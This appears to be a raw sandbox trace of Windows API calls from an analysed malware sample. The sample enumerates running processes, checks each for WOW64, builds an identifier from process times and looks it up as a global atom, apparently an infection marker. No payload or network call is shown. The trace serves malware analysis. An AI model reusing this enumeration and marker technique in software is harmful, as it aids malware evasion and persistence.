	[0128.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.371] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.371] CloseHandle (hObject=0x2dc) returned 1
	[0128.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.372] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.372] CloseHandle (hObject=0x2dc) returned 1
	[0128.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.372] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.372] CloseHandle (hObject=0x2dc) returned 1
	[0128.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.373] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.373] CloseHandle (hObject=0x2dc) returned 1
	[0128.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.373] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.373] CloseHandle (hObject=0x2dc) returned 1
	[0128.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.374] CloseHandle (hObject=0x2dc) returned 1
	[0128.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.374] CloseHandle (hObject=0x2dc) returned 1
	[0128.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.375] CloseHandle (hObject=0x2dc) returned 1
	[0128.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.375] CloseHandle (hObject=0x2dc) returned 1
	[0128.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.375] CloseHandle (hObject=0x2dc) returned 1
	[0128.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.376] CloseHandle (hObject=0x2dc) returned 1
	[0128.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.376] CloseHandle (hObject=0x2dc) returned 1
	[0128.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.377] CloseHandle (hObject=0x2dc) returned 1
	[0128.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.377] CloseHandle (hObject=0x2dc) returned 1
	[0128.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.377] CloseHandle (hObject=0x2dc) returned 1
	[0128.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.378] CloseHandle (hObject=0x2dc) returned 1
	[0128.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.378] CloseHandle (hObject=0x2dc) returned 1
	[0128.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.379] CloseHandle (hObject=0x2dc) returned 1
	[0128.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.379] CloseHandle (hObject=0x2dc) returned 1
	[0128.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.380] CloseHandle (hObject=0x2dc) returned 1
	[0128.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.380] CloseHandle (hObject=0x2dc) returned 1
	[0128.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.380] CloseHandle (hObject=0x2dc) returned 1
	[0128.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.381] CloseHandle (hObject=0x2dc) returned 1
	[0128.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.381] CloseHandle (hObject=0x2dc) returned 1
	[0128.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.382] CloseHandle (hObject=0x2dc) returned 1
	[0128.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.382] CloseHandle (hObject=0x2dc) returned 1
	[0128.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.382] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.383] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.384] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.384] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.384] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.385] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.386] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetLastError () returned 0x5
	[0128.387] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.387] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.387] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.387] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.387] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.388] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.388] CloseHandle (hObject=0x2dc) returned 1
	[0128.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.388] CloseHandle (hObject=0x2dc) returned 1
	[0128.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.389] CloseHandle (hObject=0x2dc) returned 1
	[0128.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.389] CloseHandle (hObject=0x2dc) returned 1
	[0128.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.389] CloseHandle (hObject=0x2dc) returned 1
	[0128.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.390] CloseHandle (hObject=0x2dc) returned 1
	[0128.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
